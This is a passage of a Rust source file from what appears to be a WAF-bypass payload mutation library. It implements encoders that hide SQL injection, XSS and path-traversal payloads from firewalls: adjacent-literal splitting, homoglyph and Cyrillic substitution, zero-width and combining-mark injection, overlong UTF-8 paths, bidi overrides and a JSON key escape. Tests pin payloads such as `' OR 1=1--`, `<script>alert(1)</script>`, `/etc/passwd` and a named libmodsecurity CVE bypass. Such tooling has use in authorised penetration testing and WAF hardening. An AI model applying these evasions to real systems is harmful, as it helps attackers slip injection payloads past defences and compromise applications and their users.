793            let lo = 0xDC00 + (v & 0x3FF);
794            let _ = match i % 2 {
795                0 => write!(&mut out, "\\u{:04x}\\U{:04X}", hi, lo),
796                _ => write!(&mut out, "\\U{:04X}\\u{:04x}", hi, lo),
797            };
798            continue;
799        }
800        let _ = match i % 4 {
801            0 => write!(&mut out, "\\u{:04x}", cp), // lowercase u, lowercase hex
802            1 => write!(&mut out, "\\U{:04X}", cp), // uppercase U, uppercase hex
803            2 => write!(&mut out, "\\u{:04X}", cp), // lowercase u, uppercase hex
804            _ => write!(&mut out, "\\U{:04x}", cp), // uppercase U, lowercase hex
805        };
806    }
807    out
808}
809
810/// SQL adjacent-string-literal concatenation — every `'string'` literal of
811/// length ≥ 2 is rewritten as a sequence of single-character adjacent
812/// literals: `'admin'` → `'a' 'd' 'm' 'i' 'n'`.
813///
814/// **Bypass mechanism**: SQL standard (ANSI SQL-92 §5.3) specifies that
815/// two adjacent character-string literals separated only by whitespace
816/// are concatenated by the parser. MySQL, Postgres, SQLite, Oracle, DB2
817/// all implement this. WAF rules that match the literal substring of
818/// well-known credentials or paths (e.g. `'admin'`, `'/etc/passwd'`)
819/// see N unrelated single-character strings instead of one token. The
820/// database rejoins them at parse time — no comments, no CONCAT calls,
821/// no special functions. Pure SQL semantics.
822///
823/// **Idempotent**: every output sub-literal has length 1, below the
824/// split threshold — a second pass leaves the output unchanged.
825///
826/// **Context**: Effective against any byte-pattern WAF inspecting
827/// SQL bodies. Inert outside SQL context (won't fire on non-quoted
828/// payloads).
829#[must_use]
830pub fn sql_adjacent_string_concat(payload: &str) -> String {
831    let mut out = String::with_capacity(payload.len() + 8);
832    let mut chars = payload.chars().peekable();
833    while let Some(ch) = chars.next() {
834        if ch != '\'' {
835            out.push(ch);
836            continue;
837        }
838        let mut literal = String::new();
839        let mut closed = false;
840        while let Some(&next) = chars.peek() {
841            chars.next();
842            if next == '\'' {
843                if chars.peek() == Some(&'\'') {
844                    literal.push('\'');
845                    chars.next();
846                    continue;
847                }
848                closed = true;
849                break;
850            }
851            literal.push(next);
852        }
853        if !closed {
854            out.push('\'');
855            out.push_str(&literal);
856            continue;
857        }
858        let lit_chars: Vec<char> = literal.chars().collect();
859        if lit_chars.len() < 2 {
860            // Length-0 or length-1 literal: pass through. Note for
861            // length-1 with `'`: that's a literal containing a single
862            // `'`, which we encode as `''''` (four-quote form) to keep
863            // the output SQL-valid.
864            out.push('\'');
865            if lit_chars.len() == 1 && lit_chars[0] == '\'' {
866                out.push_str("''");
867            } else {
868                out.push_str(&literal);
869            }
870            out.push('\'');
871            continue;
872        }
873        // Single-character split: each char of the literal becomes its
874        // own `'c'` quoted token, joined by single spaces. ANSI SQL-92
875        // §5.3 concatenates them at parse time. Idempotent: each output
876        // sub-literal has length 1 (below the threshold) so a second
877        // pass sees only short literals and produces identical output.
878        //
879        // Escaped-quote handling: if the source literal contained a
880        // SQL `''` escape it lives in `literal` as a single `'` char.
881        // The shattered single-char literal for that position emits
882        // `''''` (four-quote form: opening quote, escaped quote, escaped
883        // quote, closing quote) so the database reassembles the
884        // original `'` content. Idempotency holds because `''''` parses
885        // as a length-1 literal containing `'` on the next pass.
886        let mut first = true;
887        for c in lit_chars {
888            if !first {
889                out.push(' ');
890            }
891            first = false;
892            out.push('\'');
893            if c == '\'' {
894                out.push_str("''");
895            } else {
896                out.push(c);
897            }
898            out.push('\'');
899        }
900    }
901    out
902}
903
904/// Homoglyph substitution — replaces select ASCII characters with visually
905/// identical Unicode characters from other scripts.
906///
907/// **Bypass mechanism**: WAFs match `'`, `"`, `<`, `>`, `=`, etc. as literal
908/// bytes. Unicode homoglyphs look identical in logs but aren't matched by
909/// byte-level regex. If the backend performs Unicode normalization (NFKC) or
910/// accepts these codepoints in SQL/HTML contexts, the payload executes.
911///
912/// **Context**: Effective against byte-level WAFs. Requires backend Unicode
913/// tolerance (common in modern frameworks).
914#[must_use]
915pub fn homoglyph_encode(payload: &str) -> String {
916    let mut out = String::with_capacity(payload.len() * 4);
917    for ch in payload.chars() {
918        let mapped = match ch {
919            // INTENTIONALLY NOT REPLACED — SQL string delimiters.
920            // Pre-fix `'` → U+2019 and `"` → U+201D were mapped to
921            // their right-single/double quotation marks. Those
922            // codepoints are NOT recognised as string delimiters
923            // by ANY SQL parser — they're treated as word
924            // characters. The host query's string literal is never
925            // closed, the injection context-break disappears, and
926            // the payload becomes inert. Modern frameworks rarely
927            // NFKC-normalise BEFORE the SQL parser sees the bytes,
928            // so the assumption that this trick survives was wrong
929            // in practice. Keep `'` and `"` ASCII; mutate only the
930            // non-delimiter punctuation below.
931            //
932            // Comparison operators
933            '<' => '\u{FF1C}', // FULLWIDTH LESS-THAN SIGN (＜)
934            '>' => '\u{FF1E}', // FULLWIDTH GREATER-THAN SIGN (＞)
935            '=' => '\u{FF1D}', // FULLWIDTH EQUALS SIGN (＝)
936            // Punctuation
937            '(' => '\u{FF08}', // FULLWIDTH LEFT PARENTHESIS (（)
938            ')' => '\u{FF09}', // FULLWIDTH RIGHT PARENTHESIS (）)
939            ';' => '\u{FF1B}', // FULLWIDTH SEMICOLON (；)
940            '-' => '\u{2010}', // HYPHEN (‐)
941            '/' => '\u{2215}', // DIVISION SLASH (∕)
942            // Keep letters, digits, and delimiters unchanged.
943            c => c,
944        };
945        out.push(mapped);
946    }
947    out
948}
949
950/// Inject zero-width / format characters between letters of `payload`.
951///
952/// `chars` selects which invisible char to insert; `positions` controls
953/// where (every-other / per-keyword-letter / FNV-seeded). The output
954/// is byte-distinct from the input but visually identical AND, for
955/// `chars = ZERO_WIDTH_DEFAULTS`, semantically equivalent to most HTML
956/// and SQL parsers (which strip U+200B–200D / U+FEFF on parse).
957///
958/// Sucuri-documented XSS bypass `&lt;script&gt;alert(1)&lt;/script&gt;`
959/// uses U+200B between `scr` and `ipt`; the WAF regex `/script/i`
960/// misses; the browser's HTML parser drops the ZWSP and renders.
961///
962/// Use [`ZERO_WIDTH_DEFAULTS`] for the recommended cycle of
963/// [U+200B, U+200C, U+200D, U+FEFF, U+034F] — rotating across these
964/// per-position defeats WAFs that have hardcoded a single zero-width
965/// stripper.
966#[must_use]
967pub fn zero_width_inject(payload: &str, invisible_char: char) -> String {
968    let mut out = String::with_capacity(payload.len() * 2);
969    let mut chars = payload.chars().peekable();
970    while let Some(ch) = chars.next() {
971        out.push(ch);
972        // Inject after every alphanumeric except the last char of the
973        // string (so trailing context is preserved).
974        if ch.is_ascii_alphanumeric() && chars.peek().is_some() {
975            out.push(invisible_char);
976        }
977    }
978    out
979}
980
981/// Recommended cycle of invisible characters for zero-width injection.
982/// `[U+200B ZWSP, U+200C ZWNJ, U+200D ZWJ, U+FEFF BOM, U+034F CGJ]`.
983pub const ZERO_WIDTH_DEFAULTS: [char; 5] =
984    ['\u{200B}', '\u{200C}', '\u{200D}', '\u{FEFF}', '\u{034F}'];
985
986/// Inject a combining diacritical mark after each letter of `payload`.
987///
988/// `s̈elect` (s + U+0308 COMBINING DIAERESIS + elect) reads as `select`
989/// after NFC normalisation (Python `unicodedata.normalize('NFC', x)`,
990/// Java `Normalizer.normalize(s, NFC)`) but the WAF regex `/select/`
991/// sees a different byte sequence and misses.
992///
993/// Common safe marks (no NFC reflow, just stripped by char-walk
994/// readers): U+0300 grave, U+0301 acute, U+0308 diaeresis, U+0327
995/// cedilla. U+034F COMBINING GRAPHEME JOINER is the most invisible
996/// (zero width, no visual diacritic), so it's the default.
997#[must_use]
998pub fn combining_mark_inject(payload: &str, mark: char) -> String {
999    let mut out = String::with_capacity(payload.len() * 3);
1000    for ch in payload.chars() {
1001        out.push(ch);
1002        if ch.is_ascii_alphabetic() {
1003            out.push(mark);
1004        }
1005    }
1006    out
1007}
1008
1009/// Cross-script Cyrillic / Greek letter substitution.
1010///
1011/// Unlike [`homoglyph_encode`] (punctuation-only by design),
1012/// `script_homoglyph_encode` substitutes the *letters* themselves
1013/// with visually-identical codepoints from Cyrillic + Greek scripts
1014/// that the WAF regex sees as different bytes. Two sub-classes:
1015///
1016/// 1. **Non-normalising** (Cyrillic ѕ U+0455, е U+0435, о U+043E,
1017///    а U+0430; Greek ο U+03BF, ν U+03BD, …) — backend and WAF both
1018///    see different codepoints, but MSSQL's implicit Unicode→varchar
1019///    coercion maps Cyrillic lookalikes to ASCII via collation
1020///    (`SQL_Latin1_General_CP1_CI_AI`).
1021/// 2. **NFKC-normalising** — letterlike block letters (already covered
1022///    by `letterlike_encode`).
1023///
1024/// This function targets class 1 only — for class 2 use
1025/// [`letterlike_encode`] / `math_*_encode`.
1026#[must_use]
1027pub fn script_homoglyph_encode(payload: &str) -> String {
1028    let mut out = String::with_capacity(payload.len() * 2);
1029    for ch in payload.chars() {
1030        let mapped = match ch {
1031            // Cyrillic lowercase lookalikes.
1032            'a' => '\u{0430}', // CYRILLIC SMALL LETTER A
1033            'c' => '\u{0441}', // CYRILLIC SMALL LETTER ES
1034            'e' => '\u{0435}', // CYRILLIC SMALL LETTER IE
1035            'o' => '\u{043E}', // CYRILLIC SMALL LETTER O
1036            'p' => '\u{0440}', // CYRILLIC SMALL LETTER ER
1037            's' => '\u{0455}', // CYRILLIC SMALL LETTER DZE
1038            'x' => '\u{0445}', // CYRILLIC SMALL LETTER HA
1039            'y' => '\u{0443}', // CYRILLIC SMALL LETTER U
1040            // Cyrillic uppercase lookalikes.
1041            'A' => '\u{0410}',
1042            'B' => '\u{0412}',
1043            'C' => '\u{0421}',
1044            'E' => '\u{0415}',
1045            'H' => '\u{041D}',
1046            'K' => '\u{041A}',
1047            'M' => '\u{041C}',
1048            'O' => '\u{041E}',
1049            'P' => '\u{0420}',
1050            'T' => '\u{0422}',
1051            'X' => '\u{0425}',
1052            // Greek lookalikes for remaining letters.
1053            'n' => '\u{03B7}', // GREEK SMALL LETTER ETA
1054            'v' => '\u{03BD}', // GREEK SMALL LETTER NU
1055            c => c,
1056        };
1057        out.push(mapped);
1058    }
1059    out
1060}
1061
1062/// Turkish dotless-i substitution: replace `i`/`I` with U+0131/U+0130.
1063///
1064/// U+0131 LATIN SMALL LETTER DOTLESS I does NOT ASCII-uppercase to `I`
1065/// (it only uppercases to `I` in Turkish locale). A WAF that performs
1066/// ASCII case-fold via Lua `string.lower` or PHP `strtolower` (CRS
1067/// default) misses `scrıpt` when looking for `script`. The HTML5 spec
1068/// requires browsers to normalise U+0131 to `i` in tag names, so
1069/// `&lt;scrıpt&gt;alert(1)&lt;/scrıpt&gt;` renders as a script tag.
1070///
1071/// CVE-class: GitHub auth byass via Turkish dotless-i (dev.to 2018).
1072#[must_use]
1073pub fn turkish_i_encode(payload: &str) -> String {
1074    payload
1075        .chars()
1076        .map(|ch| match ch {
1077            'i' => '\u{0131}',
1078            'I' => '\u{0130}',
1079            c => c,
1080        })
1081        .collect()
1082}
1083
1084/// Sharp-s (ß U+00DF) substitution for `s`/`S`.
1085///
1086/// ß lowercases to itself in most locales, but Unicode FULL case-fold
1087/// (`str::to_lowercase` in Rust, `str.casefold()` in Python) maps the
1088/// CAPITAL letter sharp s `ẞ` (U+1E9E) to `ss`. WAFs that case-fold
1089/// before regex see different byte sequence; backends with full
1090/// Unicode casefold reach the same `script` / `select`. Narrower
1091/// applicability than [`turkish_i_encode`].
1092#[must_use]
1093pub fn sharp_s_encode(payload: &str) -> String {
1094    payload
1095        .chars()
1096        .map(|ch| match ch {
1097            's' | 'S' => '\u{00DF}', // ß
1098            c => c,
1099        })
1100        .collect()
1101}
1102
1103/// AWS WAF JSON-pointer escape — encode every char of `key` as
1104/// `\uXXXX` so the WAF's JSON-pointer rule (e.g. `/id` literal-match)
1105/// misses, while the backend JSON parser decodes the escape and
1106/// routes the value to the original field.
1107///
1108/// Returns the JSON fragment `{"<key-escaped>": "<value>"}` ready to
1109/// drop into a request body. Sicuranext 2024 confirmed bypass.
1110#[must_use]
1111pub fn json_key_unicode_escape(key: &str, value: &str) -> String {
1112    let mut escaped_key = String::with_capacity(key.len() * 6);
1113    for ch in key.chars() {
1114        let cp = ch as u32;
1115        if cp <= 0xFFFF {
1116            escaped_key.push_str(&format!("\\u{:04x}", cp));
1117        } else {
1118            // Surrogate pair for non-BMP codepoints.
1119            let v = cp - 0x10000;
1120            let hi = 0xD800 + (v >> 10);
1121            let lo = 0xDC00 + (v & 0x3FF);
1122            escaped_key.push_str(&format!("\\u{:04x}\\u{:04x}", hi, lo));
1123        }
1124    }
1125    // Value goes through JSON-safe encode (the existing helper).
1126    let value_json = serde_json::to_string(value).unwrap_or_else(|_| format!("\"{value}\""));
1127    format!("{{\"{escaped_key}\": {value_json}}}")
1128}
1129
1130/// Overlong UTF-8 encoding of `.` and `/` for path traversal.
1131///
1132/// CRS GitHub issue #4189 (opened 2025-07, still open) — CRS does
1133/// not alert on `%c0%ae%c0%ae%c0%af` (`../` in 2-byte overlong UTF-8).
1134/// Servers that strictly decode UTF-8 reject these as malformed; older
1135/// JVMs, some C libs (CVE-2017-9805 Struts2), and a non-trivial set
1136/// of internal services accept them. WAF gap + permissive backend =
1137/// path traversal that the WAF doesn't see.
1138///
1139/// `width` selects the overlong representation: 2 (default), 3, or 4
1140/// bytes. Each level is independently checked by some decoders, so a
1141/// 3-byte overlong may pass where a 2-byte one is filtered.
1142#[must_use]
1143pub fn overlong_utf8_path(path: &str, width: u8) -> String {
1144    let dot = match width {
1145        2 => "%c0%ae",
1146        3 => "%e0%80%ae",
1147        _ => "%f0%80%80%ae", // 4-byte default for unknown width
1148    };
1149    let slash = match width {
1150        2 => "%c0%af",
1151        3 => "%e0%80%af",
1152        _ => "%f0%80%80%af",
1153    };
1154    let bs = match width {
1155        2 => "%c0%5c",
1156        3 => "%e0%80%5c",
1157        _ => "%f0%80%80%5c",
1158    };
1159    // §1 SPEED: replaced `.map(|c| c.to_string()).collect::<String>()` which
1160    // allocates one String per character with a push-loop into a pre-sized
1161    // buffer. The three special chars map to static string slices; all other
1162    // codepoints push directly. No heap allocation per character.
1163    let mut out = String::with_capacity(path.len() * slash.len());
1164    for c in path.chars() {
1165        match c {
1166            '.' => out.push_str(dot),
1167            '/' => out.push_str(slash),
1168            '\\' => out.push_str(bs),
1169            c => out.push(c),
1170        }
1171    }
1172    out
1173}
1174
1175/// Bidi override wrapper — wraps `reversed_keyword` between U+202E
1176/// (RIGHT-TO-LEFT OVERRIDE) and U+202C (POP DIRECTIONAL FORMATTING).
1177///
1178/// The WAF scans left-to-right byte order: it sees `tceleS`. Rendered
1179/// text in a BiDi-aware viewer (e.g. browser, IDE, security analyst's
1180/// dashboard) shows `Select`. CVE-2021-42574 (Trojan Source) class.
1181///
1182/// **Narrow direct bypass surface** — most SQL parsers reject bare
1183/// U+202E. Useful primarily for WAF log poisoning and rule-auditing
1184/// tool confusion; some template engines do strip bidi chars before
1185/// forwarding, in which case the reversed payload becomes live.
1186#[must_use]
1187pub fn bidi_inject(reversed_keyword: &str) -> String {
1188    format!("\u{202E}{reversed_keyword}\u{202C}")
1189}
1190
1191#[cfg(test)]
1192mod tests {
1193    use super::*;
1194
1195    #[test]
1196    fn unicode_encode_basic() {
1197        assert_eq!(unicode_encode("A"), "\\u0041");
1198        assert_eq!(unicode_encode("AB"), "\\u0041\\u0042");
1199    }
1200
1201    #[test]
1202    fn json_unicode_alnum_keyword_split() {
1203        // "UNION" becomes 5 `\uXXXX` sequences, ASCII bytes nowhere.
1204        let out = json_unicode_alnum("UNION");
1205        assert_eq!(out, "\\u0055\\u004E\\u0049\\u004F\\u004E");
1206        assert!(!out.contains("UNION"));
1207    }
1208
1209    // ── json_unicode_full / mixed_case tests ──────────────────────────
1210
1211    #[test]
1212    fn json_unicode_full_escapes_every_char() {
1213        let out = json_unicode_full("a' b");
1214        // Every char including space and quote escaped.
1215        assert!(out.contains("\\u0061")); // a
1216        assert!(out.contains("\\u0027")); // '
1217        assert!(out.contains("\\u0020")); // space
1218        assert!(out.contains("\\u0062")); // b
1219        // No literal input char remains as plain (input letters 'a' and 'b'
1220        // appear only inside hex of escapes; the literal 'a' standalone
1221        // boundary should NOT be present as a runnable token).
1222        // Simpler check: every output codepoint is either backslash, 'u',
1223        // or hex digit.
1224        for c in out.chars() {
1225            assert!(
1226                c == '\\' || c == 'u' || c.is_ascii_hexdigit(),
1227                "unexpected raw char {c:?} in {out}"
1228            );
1229        }
1230    }
1231
1232    #[test]
1233    fn json_unicode_full_idempotent_on_pre_escaped() {
1234        let already = "\\u0073elect";
1235        let out = json_unicode_full(already);
1236        // Pre-existing s stays unchanged; "elect" gets escaped.
1237        assert!(out.starts_with("\\u0073"));
1238        assert!(out.contains("\\u0065")); // e
1239    }
1240
1241    #[test]
1242    fn json_unicode_full_handles_non_bmp_via_surrogate_pair() {
1243        // U+1F600 GRINNING FACE → 😀
1244        let out = json_unicode_full("😀");
1245        assert_eq!(out, "\\uD83D\\uDE00");
1246    }
1247
1248    #[test]
1249    fn json_unicode_mixed_case_alternates_forms() {
1250        let out = json_unicode_mixed_case("abcd");
1251        // 4 chars → 4 different forms.
1252        assert!(out.contains("\\u0061")); // i=0 lowercase
1253        assert!(out.contains("\\U0062")); // i=1 uppercase U
1254        assert!(out.contains("\\u0063")); // i=2 lower u, upper hex
1255        assert!(out.contains("\\U0064")); // i=3 upper U, lower hex
1256    }
1257
1258    #[test]
1259    fn json_unicode_alnum_leaves_punctuation() {
1260        // SQLi shape: keywords escaped, structural delimiters bare.
1261        let out = json_unicode_alnum("' OR 1=1--");
1262        assert_eq!(out, "' \\u004F\\u0052 \\u0031=\\u0031--");
1263        let out2 = json_unicode_alnum("AB CD");
1264        assert_eq!(out2, "\\u0041\\u0042 \\u0043\\u0044");
1265    }
1266
1267    #[test]
1268    fn json_unicode_alnum_idempotent_skip_pass() {
1269        // Second pass MUST be a no-op — already-escaped \uXXXX
1270        // sequences are detected and passed through.
1271        let once = json_unicode_alnum("UNION SELECT");
1272        let twice = json_unicode_alnum(&once);
1273        assert_eq!(once, twice, "tamper must stabilize");
1274    }
1275
1276    #[test]
1277    fn json_unicode_alnum_preserves_quote_unencoded() {
1278        // ' is U+0027 — NOT alphanumeric, so must stay literal.
1279        let out = json_unicode_alnum("'");
1280        assert_eq!(out, "'");
1281    }
1282
1283    #[test]
1284    fn json_unicode_alnum_xss_keyword_split() {
1285        // <script>alert — `<`, `>`, `(`, `)` stay bare; letters/digits escape.
1286        let out = json_unicode_alnum("<script>alert(1)</script>");
1287        assert!(!out.contains("script"));
1288        assert!(!out.contains("alert"));
1289        assert!(out.contains('<'));
1290        assert!(out.contains('>'));
1291        assert!(out.contains('('));
1292    }
1293
1294    #[test]
1295    fn json_unicode_alnum_empty_input() {
1296        assert_eq!(json_unicode_alnum(""), "");
1297    }
1298
1299    #[test]
1300    fn sql_adjacent_string_concat_basic() {
1301        // 'admin' (len 5) → 5 single-char adjacent literals.
1302        assert_eq!(sql_adjacent_string_concat("'admin'"), "'a' 'd' 'm' 'i' 'n'");
1303    }
1304
1305    #[test]
1306    fn sql_adjacent_string_concat_short_literal_unchanged() {
1307        // Length-1 literals must pass through (already minimum).
1308        assert_eq!(sql_adjacent_string_concat("'a'"), "'a'");
1309        assert_eq!(sql_adjacent_string_concat("''"), "''");
1310    }
1311
1312    #[test]
1313    fn sql_adjacent_string_concat_idempotent() {
1314        // Well-formed (balanced quotes) payload — the literals 'admin'
1315        // and 'root' each shatter into single-char adjacent literals.
1316        let once = sql_adjacent_string_concat("WHERE x='admin' OR y='root'");
1317        let twice = sql_adjacent_string_concat(&once);
1318        assert_eq!(once, twice, "tamper must stabilize on second pass");
1319        assert!(once.contains("'a' 'd' 'm' 'i' 'n'"));
1320        assert!(once.contains("'r' 'o' 'o' 't'"));
1321    }
1322
1323    #[test]
1324    fn sql_adjacent_string_concat_preserves_outside_literal() {
1325        // No quoted literal in payload — must be a no-op.
1326        assert_eq!(sql_adjacent_string_concat("1 OR 1=1--"), "1 OR 1=1--");
1327    }
1328
1329    #[test]
1330    fn sql_adjacent_string_concat_handles_escaped_quote() {
1331        // SQL '' escape inside a literal: the position holding `'` is
1332        // emitted as the four-quote form `''''` — opening, escaped pair,
1333        // closing — which parses as a length-1 literal containing `'`.
1334        // The database reassembles "O" + "'" + "B" + "r" + "i" + "e" + "n".
1335        let out = sql_adjacent_string_concat("'O''Brien'");
1336        assert_eq!(out, "'O' '''' 'B' 'r' 'i' 'e' 'n'");
1337    }
1338
1339    #[test]
1340    fn sql_adjacent_string_concat_escaped_quote_idempotent() {
1341        // Second pass: the `''''` token is a length-1 literal containing
1342        // `'` (below split threshold). It must pass through unchanged
1343        // (via the length-1 branch with the escaped-quote sub-case).
1344        let once = sql_adjacent_string_concat("'O''Brien'");
1345        let twice = sql_adjacent_string_concat(&once);
1346        assert_eq!(once, twice);
1347    }
1348
1349    #[test]
1350    fn sql_adjacent_string_concat_single_quote_literal_emits_four_quotes() {
1351        // A literal of length 1 containing only `'` (source: `''''`)
1352        // must output the same `''''` (passthrough form).
1353        let out = sql_adjacent_string_concat("''''");
1354        assert_eq!(out, "''''");
1355    }
1356
1357    #[test]
1358    fn sql_adjacent_string_concat_its_a_test_shatters_correctly() {
1359        // The dogfood agent's B5 reproducer.
1360        let out = sql_adjacent_string_concat("'it''s a test'");
1361        // Literal content: "it's a test" (11 chars). Each char emits
1362        // its own single-char literal; the `'` becomes `''''`.
1363        assert_eq!(out, "'i' 't' '''' 's' ' ' 'a' ' ' 't' 'e' 's' 't'");
1364    }
1365
1366    #[test]
1367    fn sql_adjacent_string_concat_unterminated_quote_passthrough() {
1368        // Defensive: an unclosed quote must not crash and must not
1369        // wrap-then-mistakenly-close. Output should preserve the bytes
1370        // verbatim except for the unmatched-quote tail.
1371        let out = sql_adjacent_string_concat("'unclosed");
1372        assert_eq!(out, "'unclosed");
1373    }
1374
1375    #[test]
1376    fn sql_adjacent_string_concat_path_literal_split() {
1377        // /etc/passwd path literal is a high-fidelity LFI fingerprint.
1378        // 11 chars → 11 single-char literals; the byte sequence
1379        // `/etc/passwd` no longer appears contiguously.
1380        let out = sql_adjacent_string_concat("'/etc/passwd'");
1381        assert_eq!(out, "'/' 'e' 't' 'c' '/' 'p' 'a' 's' 's' 'w' 'd'");
1382        assert!(!out.contains("/etc/passwd"));
1383    }
1384
1385    #[test]
1386    fn json_unicode_alnum_unicode_input_passes_through() {
1387        // Non-ASCII chars (日本語) are NOT ascii_alphanumeric — left bare.
1388        // This keeps the function focused on the keyword-bypass mission.
1389        let out = json_unicode_alnum("日本");
1390        assert_eq!(out, "日本");
1391    }
1392
1393    #[test]
1394    fn unicode_encode_special_chars() {
1395        let encoded = unicode_encode("' OR 1=1--");
1396        assert!(encoded.contains("\\u0027")); // '
1397        assert!(encoded.contains("\\u003D")); // =
1398    }
1399
1400    #[test]
1401    fn unicode_encode_unicode() {
1402        let encoded = unicode_encode("日本語");
1403        assert_eq!(encoded, "\\u65E5\\u672C\\u8A9E");
1404    }
1405
1406    #[test]
1407    fn iis_unicode_encode_basic() {
1408        assert_eq!(iis_unicode_encode("A"), "%u0041");
1409        assert_eq!(iis_unicode_encode("AB"), "%u0041%u0042");
1410    }
1411
1412    #[test]
1413    fn iis_unicode_encode_bmp_only_for_3byte_utf8() {
1414        // U+65E5 (日) is BMP — emits as a single %uXXXX, no
1415        // surrogate. This is the existing happy path.
1416        assert_eq!(iis_unicode_encode("日"), "%u65E5");
1417    }
1418
1419    #[test]
1420    fn iis_unicode_encode_non_bmp_emits_surrogate_pair() {
1421        // U+1F600 (😀) is supplementary plane. Pre-fix this emitted
1422        // `%u1F600` (5 hex digits — invalid IIS %u, silently
1423        // unencodable, bypass-rate killer). Post-fix it MUST emit a
1424        // UTF-16 surrogate pair `%uD83D%uDE00`.
1425        assert_eq!(iis_unicode_encode("😀"), "%uD83D%uDE00");
1426    }
1427
1428    #[test]
1429    fn iis_unicode_encode_mixed_bmp_and_non_bmp() {
1430        // Adversarial: a mix of plain ASCII + BMP + supplementary
1431        // must produce exactly one %uXXXX or %uXXXX%uXXXX per char.
1432        // No 5-digit %u sequences anywhere — pin the regression.
1433        let out = iis_unicode_encode("A日😀");
1434        assert_eq!(out, "%u0041%u65E5%uD83D%uDE00");
1435        // Anti-regression: scan for any 5-hex-digit %u sequence.
1436        // The fix would silently regress if someone widened the
1437        // format string to %u{:05X} thinking it "supports" non-BMP.
1438        for hex_run in out.split("%u").skip(1) {
1439            let hex_part: String = hex_run
1440                .chars()
1441                .take_while(|c| c.is_ascii_hexdigit())
1442                .collect();
1443            assert!(
1444                hex_part.len() == 4,
1445                "every %u sequence must be exactly 4 hex digits (IIS spec); \
1446                 got {hex_part:?} in output {out:?}"
1447            );
1448        }
1449    }
1450
1451    #[test]
1452    fn json_encode_basic() {
1453        // F67: encoder produces escaped CONTENT only (no
1454        // surrounding double-quotes). Callers inject into an
1455        // existing JSON string field; wrapping our own quotes
1456        // would break the host JSON document.
1457        assert_eq!(json_string_encode("A"), "A");
1458        assert_eq!(json_string_encode("A\\B"), "A\\\\B");
1459        assert_eq!(json_string_encode("A\"B"), "A\\\"B");
1460        assert_eq!(json_string_encode("A\nB"), "A\\nB");
1461    }
1462
1463    #[test]
1464    fn json_encode_control_chars() {
1465        assert_eq!(json_string_encode("\x01"), "\\u0001");
1466    }
1467
1468    #[test]
1469    fn html_entity_encode_basic() {
1470        assert_eq!(html_entity_encode("A"), "&#x41;");
1471        assert_eq!(html_entity_encode("AB"), "&#x41;&#x42;");
1472    }
1473
1474    #[test]
1475    fn html_entity_encode_special_chars() {
1476        let encoded = html_entity_encode("<script>");
1477        assert_eq!(encoded, "&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;");
1478    }
1479
1480    #[test]
1481    fn html_entity_decimal_encode_basic() {
1482        assert_eq!(html_entity_decimal_encode("A"), "&#65;");
1483        assert_eq!(html_entity_decimal_encode("<"), "&#60;");
1484    }
1485
1486    #[test]
1487    fn html_entity_encode_empty() {
1488        assert_eq!(html_entity_encode(""), "");
1489    }
1490
1491    // ── html_entity_zero_pad tests (CVE-2025-27110) ────────────────────
1492
1493    #[test]
1494    fn html_entity_zero_pad_hex_width_4_matches_cve_advisory_example() {
1495        // Pinned to the exact form the CVE-2025-27110 advisory uses
1496        // as its smoking gun: `&#x003C;` for `<`. If this drifts
1497        // (someone "tidies" the formatter), every libmodsecurity
1498        // 3.0.13 bypass stops working.
1499        assert_eq!(html_entity_zero_pad("<", 4, true), "&#x003C;");
1500    }
1501
1502    #[test]
1503    fn html_entity_zero_pad_decimal_width_4_matches_cve_advisory_example() {
1504        // The decimal counterpart from the same advisory: `&#0060;`
1505        // for `<`. Same bypass mechanism, different radix.
1506        assert_eq!(html_entity_zero_pad("<", 4, false), "&#0060;");
1507    }
1508
1509    #[test]
1510    fn html_entity_zero_pad_width_1_is_unpadded() {
1511        // width=1 means "pad to at least 1" which for any code point
1512        // > 0 is a no-op. Anti-rig: the function must not insert
1513        // leading zeros at width=1, otherwise it becomes equivalent
1514        // to width=2 and the "no-padding" form is unreachable.
1515        assert_eq!(html_entity_zero_pad("A", 1, true), "&#x41;");
1516        assert_eq!(html_entity_zero_pad("A", 1, false), "&#65;");
1517    }
1518
1519    #[test]
1520    fn html_entity_zero_pad_width_0_is_coerced_to_1() {
1521        // Boundary: pad=0 is a contract-violating input. We coerce
1522        // to 1 (the "no-padding" form) rather than emit `&#x;` (a
1523        // malformed entity). Catches a future refactor that uses
1524        // `pad.min(16)` only and forgets the `.max(1)` lower bound.
1525        assert_eq!(html_entity_zero_pad("A", 0, true), "&#x41;");
1526    }
1527
1528    #[test]
1529    fn html_entity_zero_pad_width_above_cap_is_clamped() {
1530        // Boundary: pad=100 is an anti-DoS concern. We clamp at 16.
1531        // The result for 'A' (0x41 = 2 hex digits) padded to 16 is
1532        // `&#x0000000000000041;` — 14 leading zeros. Pin the exact
1533        // byte sequence so a future change to the cap is visible
1534        // (and intentional).
1535        assert_eq!(html_entity_zero_pad("A", 100, true), "&#x0000000000000041;");
1536    }
1537
1538    #[test]
1539    fn html_entity_zero_pad_empty_input_produces_empty_output() {
1540        // Anti-rig: empty input must produce empty output (the
1541        // identity element of concatenation). A naive `for ch in
1542        // ""` does the right thing today; this test pins that the
1543        // result is exactly "" rather than e.g. "&#x;" from a
1544        // single dangling write.
1545        assert_eq!(html_entity_zero_pad("", 4, true), "");
1546        assert_eq!(html_entity_zero_pad("", 4, false), "");
1547    }
1548
1549    #[test]
1550    fn html_entity_zero_pad_xss_payload_round_trip_browser_equivalent() {
1551        // CVE-2025-27110 exploit-path smoke: a `<script>` payload
1552        // routed through width-4 hex must produce the exact byte
1553        // sequence that the CVE write-up shows as bypassing
1554        // libmodsecurity 3.0.13. If this changes, we're not
1555        // shipping the documented bypass anymore.
1556        let out = html_entity_zero_pad("<script>", 4, true);
1557        assert_eq!(
1558            out,
1559            "&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;"
1560        );
1561    }
1562
1563    // ── html_entity_variants tests ─────────────────────────────────────
1564
1565    #[test]
1566    fn html_entity_variants_cycles_four_forms() {
1567        // 'A'=0x41=65 — verify each of the four rotation slots
1568        let encoded = html_entity_variants("AAAA");
1569        assert_eq!(encoded, "&#x41;&#X41;&#65;&#00065;");
1570    }
1571
1572    #[test]
1573    fn html_entity_variants_continues_rotation() {
1574        // 'A'=65 — fifth char returns to slot 0 (lowercase-x hex)
1575        let encoded = html_entity_variants("AAAAA");
1576        assert_eq!(encoded, "&#x41;&#X41;&#65;&#00065;&#x41;");
1577    }
1578
1579    #[test]
1580    fn html_entity_variants_empty() {
1581        assert_eq!(html_entity_variants(""), "");
1582    }
1583
1584    #[test]
1585    fn html_entity_variants_xss_payload() {
